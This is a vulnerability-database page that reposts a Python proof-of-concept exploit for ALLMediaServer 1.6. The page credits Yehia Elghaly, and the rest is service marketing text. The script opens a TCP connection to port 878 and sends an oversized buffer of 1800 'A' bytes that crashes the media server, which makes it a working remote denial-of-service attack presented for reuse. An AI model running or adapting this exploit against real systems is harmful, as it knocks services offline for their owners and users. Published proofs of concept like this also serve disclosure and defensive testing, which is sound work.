Lucene search
K

ALLMediaServer 1.6 Remote Buffer Overflow Exploit

🗓️ 29 Mar 2022 00:00:00Reported by Yehia ElghalyType 
zdt
 zdt
🔗 0day.today👁 336 Views

ALLMediaServer 1.6 Remote Buffer Overflow Exploit by Yehia Elghaly. Vulnerability type: Buffer Overflow (DoS) Remote. Tested on Windows 7 x86 - Windows 10 x6

Code
# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Vendor Homepage: https://www.allmediaserver.org/
# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe
# Tested Version: 1.6
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: Windows 7 x86 - Windows 10 x64

# Description: ALLMediaServer 1.6 Remote Buffer Overflow

# Steps to reproduce:
# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878
# 2. - Run the Script from remote TCP/IP
# 3. - Mediaserver.exe Crashed


import socket

print("######################################################")
print("# ALLMediaServer 1.6 Remote (BUffer Overflow)        #")
print("#             --------------------------           #")
print("#               BY  Yehia Elghaly                    #")
print("######################################################")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect(('192.168.1.99', 878))
  evilbuffer = "A" *1800
  s.sendall(evilbuffer)
  data = s.recv(1024)
  s.close()
  print "Media is Out"
except socket.error, msg:
  print ""
  print "Couldnt connect with Mediaserver - Crashed"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2022 00:00Current
7.1High risk
Vulners AI Score7.1
336